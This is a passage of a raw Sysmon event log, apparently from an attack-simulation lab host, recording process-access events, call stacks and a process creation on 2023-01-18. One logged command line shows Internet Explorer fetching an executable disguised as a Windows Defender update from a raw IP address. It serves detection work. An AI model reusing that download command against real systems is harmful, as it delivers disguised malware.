Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1409f8|C:\Windows\System32\windows.storage.dll+13dd6c|C:\Windows\System32\windows.storage.dll+13db48|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.753{FE4C2B44-E474-63C7-2706-00000000AF02}7046344C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1409f8|C:\Windows\System32\windows.storage.dll+13dd6c|C:\Windows\System32\windows.storage.dll+13db48|C:\Windows\System32\shcore.dll+3283b|C:\Windows\System32\shcore.dll+3279f|C:\Windows\SYSTEM32\IEFRAME.dll+8dacc|C:\Windows\SYSTEM32\IEFRAME.dll+8d8c5|C:\Windows\SYSTEM32\IEFRAME.dll+8d662|C:\Windows\SYSTEM32\IEFRAME.dll+8d2f7|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.738{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.734{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\iertutil.dll+36e31|C:\Windows\SYSTEM32\iertutil.dll+369e0|C:\Windows\SYSTEM32\iertutil.dll+34c0c|C:\Windows\SYSTEM32\iertutil.dll+34fbf|C:\Windows\SYSTEM32\iertutil.dll+481f8|C:\Windows\SYSTEM32\IEFRAME.dll+2baa62|C:\Windows\SYSTEM32\IEFRAME.dll+cf619|C:\Windows\SYSTEM32\IEFRAME.dll+f94d8|C:\Windows\SYSTEM32\IEFRAME.dll+f93e0|C:\Windows\SYSTEM32\IEFRAME.dll+c89bd|C:\Windows\SYSTEM32\IEFRAME.dll+2a7b76|C:\Windows\SYSTEM32\IEFRAME.dll+152ad4|C:\Windows\SYSTEM32\IEFRAME.dll+da62d|C:\Windows\SYSTEM32\IEFRAME.dll+152b5f|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000041923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.733{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=457C7FBA873CFCC568534B099EC2CA99,SHA256=49ECD374D1EE098426A599CCA8C7B3045C81C149A7E703CE07F2A687D231CF2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.731{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.726{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.726{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.726{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.726{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.726{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|C:\Windows\SYSTEM32\iertutil.dll+26f7c|C:\Windows\SYSTEM32\iertutil.dll+28073|C:\Windows\SYSTEM32\iertutil.dll+36971|C:\Windows\SYSTEM32\iertutil.dll+34c0c|C:\Windows\SYSTEM32\iertutil.dll+34fbf|C:\Windows\SYSTEM32\iertutil.dll+481f8|C:\Windows\SYSTEM32\IEFRAME.dll+2baa62|C:\Windows\SYSTEM32\IEFRAME.dll+cf619|C:\Windows\SYSTEM32\IEFRAME.dll+f94d8|C:\Windows\SYSTEM32\IEFRAME.dll+f93e0|C:\Windows\SYSTEM32\IEFRAME.dll+c89bd|C:\Windows\SYSTEM32\IEFRAME.dll+2a7b76|C:\Windows\SYSTEM32\IEFRAME.dll+152ad4|C:\Windows\SYSTEM32\IEFRAME.dll+da62d|C:\Windows\SYSTEM32\IEFRAME.dll+152b5f|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.715{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\iexplore.exe11.00.14393.2007 (rs1_release.171231-1800)Internet ExplorerInternet ExplorerMicrosoft CorporationIEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:704 CREDAT:82945 /prefetch:2C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=7D930D55986DF5C69CF1A9C2DE7E33B3,SHA256=BEBB0D2229700C6A62B7811985061DC75F6279AB0FF8747C47CCADB6CC2CC462,IMPHASH=E7542C041AAD637F8E6918BBE235A488{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000041915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.714{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.708{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.701{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.692{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.678{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.678{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.678{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.658{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.658{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.658{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.398{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.398{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.382{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.366{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\IEFRAME.dll+caa49|C:\Windows\SYSTEM32\IEFRAME.dll+ca9c7|C:\Windows\SYSTEM32\IEFRAME.dll+ca941|C:\Windows\SYSTEM32\IEFRAME.dll+cb5d2|C:\Windows\SYSTEM32\IEFRAME.dll+2a78a0|C:\Windows\SYSTEM32\IEFRAME.dll+152ad4|C:\Windows\SYSTEM32\IEFRAME.dll+da62d|C:\Windows\SYSTEM32\IEFRAME.dll+152b5f|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.366{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet 